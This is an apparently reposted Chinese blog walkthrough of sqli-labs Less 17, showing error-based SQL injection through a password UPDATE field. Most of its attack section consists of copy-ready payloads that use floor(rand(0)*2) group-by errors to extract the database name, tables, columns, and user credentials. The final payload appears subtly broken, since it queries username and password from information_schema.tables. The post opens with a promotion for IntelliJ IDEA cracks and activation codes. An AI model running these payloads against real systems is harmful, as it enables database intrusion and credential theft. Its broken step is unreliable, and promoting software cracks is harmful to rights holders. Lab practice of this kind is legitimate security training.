sqli-labs less17 update query-error based

sqli-labs less17 update query-error based
强烈推介IDEA2021.1.3破解激活,IntelliJ IDEA 注册码,2021.1.3IDEA 激活码  

大家好,我是架构君,一个会写代码吟诗的架构师。今天说一说sqli-labs less17 update query-error based,希望能够帮助大家进步!!!

预备知识:逻辑or与逻辑and

    (1)a or b:若a为true,则不用管b,直接返回true。

    (2)a and b:若a为false,则不用管b,直接返回false。

    (3)优先级:等号>and>or.

  应用:

    (1)

update users set password='' or 0 where username='admin'(下图中三字段分别为id,username,password)

      sqli-labs less17 update query-error based

    (2)

update users set password='1234' or 0 where username='admin'

      sqli-labs less17 update query-error based

    (3)

update users set password='' and 1 where username='admin'

      sqli-labs less17 update query-error based

    (4)

update users set password='1234' and 1 where username='admin'

      sqli-labs less17 update query-error based

 

正文:

1、获取数据库名

 

' or (select count(*) from information_schema.tables group by concat_ws('-',(select database()),floor(rand(0)*2))) where username='admin'-- //不要忘记空格
或者
1234' and (select count(*) from information_schema.tables group by concat_ws('-',(select database()),floor(rand(0)*2))) where username='admin'-- 

sqli-labs less17 update query-error based

2、获取数据security中的表

' or (select count(*) from information_schema.tables group by concat_ws('-',(select group_concat(table_name) from information_schema.tables where table_schema='security'),floor(rand(0)*2))) where username='admin'-- 
或者
1234' and (select count(*) from information_schema.tables group by concat_ws('-',(select group_concat(table_name) from information_schema.tables where table_schema='security'),floor(rand(0)*2))) where username='admin'-- 

sqli-labs less17 update query-error based

3、获取表users中的字段

' or (select count(*) from information_schema.tables group by concat_ws('-',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),floor(rand(0)*2))) where username='admin'-- 

sqli-labs less17 update query-error based

4、获取users中的用户名和密码

' or (select count(*) from information_schema.tables group by concat_ws('-',(select concat_ws('-',username,password) from information_schema.tables where table_name='users' limit 0,1),floor(rand(0)*2))) where username='admin'-- 

sqli-labs less17 update query-error based

 

转载于:https://www.cnblogs.com/jielun/p/11001475.html

本文来源weixin_30595035,由架构君转载发布,观点不代表Java架构师必看的立场,转载请标明来源出处:https://javajgs.com/archives/29762

发表评论